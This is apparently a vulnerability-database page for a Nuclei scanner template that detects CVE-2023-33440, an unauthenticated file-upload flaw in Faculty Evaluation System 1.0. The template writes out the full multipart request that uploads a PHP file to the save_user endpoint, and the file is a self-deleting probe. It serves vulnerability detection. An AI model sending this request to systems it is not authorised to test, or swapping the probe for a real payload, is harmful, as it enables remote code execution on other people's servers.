Lucene search
K

Faculty Evaluation System v1.0 - Remote Code Execution

🗓️ 02 Jul 2026 09:36:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 40 Views

Faculty Evaluation System v1.0 - Remote Code Execution vulnerability allowing arbitrary code execution on /eval/ajax.php?action=save_use

Related
Refs
Code
ReporterTitlePublishedViews
Family
0day.today
Faculty Evaluation System 1.0 - Unauthenticated File Upload Exploit
31 May 202300:00
zdt
ATTACKERKB
CVE-2023-33440
26 May 202316:15
attackerkb
Circl
CVE-2023-33440
31 May 202300:00
circl
CNNVD
Faculty Evaluation System 安全漏洞
26 May 202300:00
cnnvd
CVE
CVE-2023-333440
25 Jun 202316:58
cve
CVE
CVE-2023-33440
26 May 202300:00
cve
Cvelist
CVE-2023-33440
26 May 202300:00
cvelist
Exploit DB
Faculty Evaluation System 1.0 - Unauthenticated File Upload
31 May 202300:00
exploitdb
NVD
CVE-2023-33440
26 May 202316:15
nvd
OSV
CVE-2023-33440
26 May 202316:15
osv
Rows per page
id: CVE-2023-33440

info:
  name: Faculty Evaluation System v1.0 - Remote Code Execution
  author: Harsh
  severity: high
  description: |
    Sourcecodester Faculty Evaluation System v1.0 is vulnerable to arbitrary code execution via /eval/ajax.php?action=save_user.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: |
    Apply the latest security patches and updates provided by the vendor to mitigate this vulnerability.
  reference:
    - http://packetstormsecurity.com/files/172672/Faculty-Evaluation-System-1.0-Shell-Upload.html
    - https://github.com/F14me7wq/bug_report/blob/main/vendors/oretnom23/faculty-evaluation-system/RCE-1.md
    - https://nvd.nist.gov/vuln/detail/CVE-2023-333440
    - https://github.com/1337kid/Exploits
    - https://github.com/Alexander-Gan/Exploits
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2023-33440
    cwe-id: CWE-434
    epss-score: 0.14507
    epss-percentile: 0.96209
    cpe: cpe:2.3:a:faculty_evaluation_system_project:faculty_evaluation_system:1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: faculty_evaluation_system_project
    product: faculty_evaluation_system
  tags: cve2023,cve,packetstorm,faculty,rce,intrusive,faculty_evaluation_system_project,vuln
variables:
  email: "{{randstr}}@{{rand_base(5)}}.com"
  string: "CVE-2023-33440"

http:
  - raw:
      - |
        POST /ajax.php?action=save_user HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=---------------------------1037163726497

        -----------------------------1037163726497
        Content-Disposition: form-data; name="id"

        1
        -----------------------------1037163726497
        Content-Disposition: form-data; name="firstname"

        Administrator
        -----------------------------1037163726497
        Content-Disposition: form-data; name="lastname"

        a
        -----------------------------1037163726497
        Content-Disposition: form-data; name="img"; filename="{{randstr}}.php"
        Content-Type: application/octet-stream

        <?php echo md5("{{string}}");unlink(__FILE__);?>
        -----------------------------1037163726497
        Content-Disposition: form-data; name="email"

        {{email}}
        -----------------------------1037163726497
        Content-Disposition: form-data; name="password"


        -----------------------------1037163726497
        Content-Disposition: form-data; name="cpass"


        -----------------------------1037163726497--
      - |
        GET /login.php HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code_1 == 200'
          - 'regex("^1$", body_1)'
          - '!regex("^2$", body_1)'
          - 'len(body_1) == 1'
          - 'contains(body_2, "Faculty Evaluation")'
        condition: and
# digest: 490a0046304402202a4491024f394b97967b662c09cb8b6163997a1e3a9de1e734224ebf644fb8d502207ba5bd5690d9a74751fce758add37aad242926fbe59a188e58b692f71759afa4:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.6High risk
Vulners AI Score7.6
CVSS 3.17.2
EPSS0.14507
SSVC
40